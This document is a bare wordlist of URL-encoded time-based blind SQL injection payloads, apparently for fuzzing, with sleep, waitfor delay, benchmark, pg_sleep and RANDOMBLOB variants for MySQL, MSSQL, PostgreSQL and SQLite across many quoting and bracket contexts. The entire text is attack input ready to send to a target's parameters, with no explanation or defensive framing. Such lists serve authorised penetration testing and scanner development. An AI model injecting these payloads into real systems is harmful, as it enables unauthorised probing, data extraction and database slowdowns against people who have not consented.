sleep(10)%23
1%20or%20sleep(10)%23
%22%20or%20sleep(10)%23
'%20or%20sleep(10)%23
%22%20or%20sleep(10)%3D%22
'%20or%20sleep(10)%3D'
1)%20or%20sleep(10)%23
%22)%20or%20sleep(10)%3D%22
')%20or%20sleep(10)%3D'
1))%20or%20sleep(10)%23
%22))%20or%20sleep(10)%3D%22
'))%20or%20sleep(10)%3D'
%3Bwaitfor%20delay%20'0%3A0%3A10'--
)%3Bwaitfor%20delay%20'0%3A0%3A10'--
'%3Bwaitfor%20delay%20'0%3A0%3A10'--
%22%3Bwaitfor%20delay%20'0%3A0%3A10'--
')%3Bwaitfor%20delay%20'0%3A0%3A10'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A10'--
))%3Bwaitfor%20delay%20'0%3A0%3A10'--
'))%3Bwaitfor%20delay%20'0%3A0%3A10'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A10'--
benchmark(10000000%2CMD5(1))%23
1%20or%20benchmark(10000000%2CMD5(1))%23
%22%20or%20benchmark(10000000%2CMD5(1))%23
'%20or%20benchmark(10000000%2CMD5(1))%23
1)%20or%20benchmark(10000000%2CMD5(1))%23
%22)%20or%20benchmark(10000000%2CMD5(1))%23
')%20or%20benchmark(10000000%2CMD5(1))%23
1))%20or%20benchmark(10000000%2CMD5(1))%23
%22))%20or%20benchmark(10000000%2CMD5(1))%23
'))%20or%20benchmark(10000000%2CMD5(1))%23
pg_sleep(10)--
1%20or%20pg_sleep(10)--
%22%20or%20pg_sleep(10)--
'%20or%20pg_sleep(10)--
1)%20or%20pg_sleep(10)--
%22)%20or%20pg_sleep(10)--
')%20or%20pg_sleep(10)--
1))%20or%20pg_sleep(10)--
%22))%20or%20pg_sleep(10)--
'))%20or%20pg_sleep(10)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))bAKL)%20AND%20'vRxe'%3D'vRxe
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))YjoC)%20AND%20'%25'%3D'
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))nQIP)
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))nQIP)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))nQIP)%23
SLEEP(10)%23
SLEEP(10)--
SLEEP(10)%3D%22
SLEEP(10)%3D'
or%20SLEEP(10)
or%20SLEEP(10)%23
or%20SLEEP(10)--
or%20SLEEP(10)%3D%22
or%20SLEEP(10)%3D'
waitfor%20delay%20'00%3A00%3A10'
waitfor%20delay%20'00%3A00%3A10'--
waitfor%20delay%20'00%3A00%3A10'%23
benchmark(100000000%2CMD5(1))
benchmark(100000000%2CMD5(1))--
benchmark(100000000%2CMD5(1))%23
or%20benchmark(100000000%2CMD5(1))
or%20benchmark(100000000%2CMD5(1))--
or%20benchmark(100000000%2CMD5(1))%23
pg_SLEEP(10)
pg_SLEEP(10)--
pg_SLEEP(10)%23
or%20pg_SLEEP(10)
or%20pg_SLEEP(10)--
or%20pg_SLEEP(10)%23
'%5C%22
AnD%20SLEEP(10)
AnD%20SLEEP(10)--
AnD%20SLEEP(10)%23
%26%26SLEEP(10)
%26%26SLEEP(10)--
%26%26SLEEP(10)%23
'%20AnD%20SLEEP(10)%20ANd%20'1
'%26%26SLEEP(10)%26%26'1
ORDER%20BY%20SLEEP(10)
ORDER%20BY%20SLEEP(10)--
ORDER%20BY%20SLEEP(10)%23
(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))ecMj)
(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))ecMj)%23
(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))ecMj)--
%2Bbenchmark(3200%2CSHA1(1))%2B'
%2B%20SLEEP(10)%20%2B%20'
RANDOMBLOB(1000000000%2F2)
AND%202947%3DLIKE('ABCDEFG'%2CUPPER(HEX(RANDOMBLOB(1000000000%2F2))))
OR%202947%3DLIKE('ABCDEFG'%2CUPPER(HEX(RANDOMBLOB(1000000000%2F2))))
RANDOMBLOB(1000000000%2F2)
AND%202947%3DLIKE('ABCDEFG'%2CUPPER(HEX(RANDOMBLOB(10000000000%2F2))))
OR%202947%3DLIKE('ABCDEFG'%2CUPPER(HEX(RANDOMBLOB(10000000000%2F2))))
SLEEP(10)%2F*'%20or%20SLEEP(10)%20or%20'%22%20or%20SLEEP(10)%20or%20%22*%2F
